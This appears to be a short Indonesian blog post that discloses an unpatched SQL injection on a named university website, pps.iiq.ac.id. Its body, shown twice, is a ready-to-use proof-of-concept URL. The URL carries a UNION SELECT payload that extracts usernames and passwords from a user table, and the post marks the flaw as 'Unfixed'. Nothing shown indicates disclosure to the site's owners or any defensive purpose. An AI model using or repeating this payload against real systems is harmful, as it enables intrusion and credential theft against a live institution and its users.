SQL Injection in http://pps.iiq.ac.id/
Iseng dorking XSS malah nemu bug SQL Injection :D
POC: http://pps.iiq.ac.id/pustaka/search.php?prefix=Q%27+union+select+1,2,group_concat(username,0x3a,password,0x3a),4,5+from+_xuser--+-
Status: Unfixed
Iseng dorking XSS malah nemu bug SQL Injection :D
POC: http://pps.iiq.ac.id/pustaka/search.php?prefix=Q%27+union+select+1,2,group_concat(username,0x3a,password,0x3a),4,5+from+_xuser--+-
Status: Unfixed
0 Tanggapan:
Post a Comment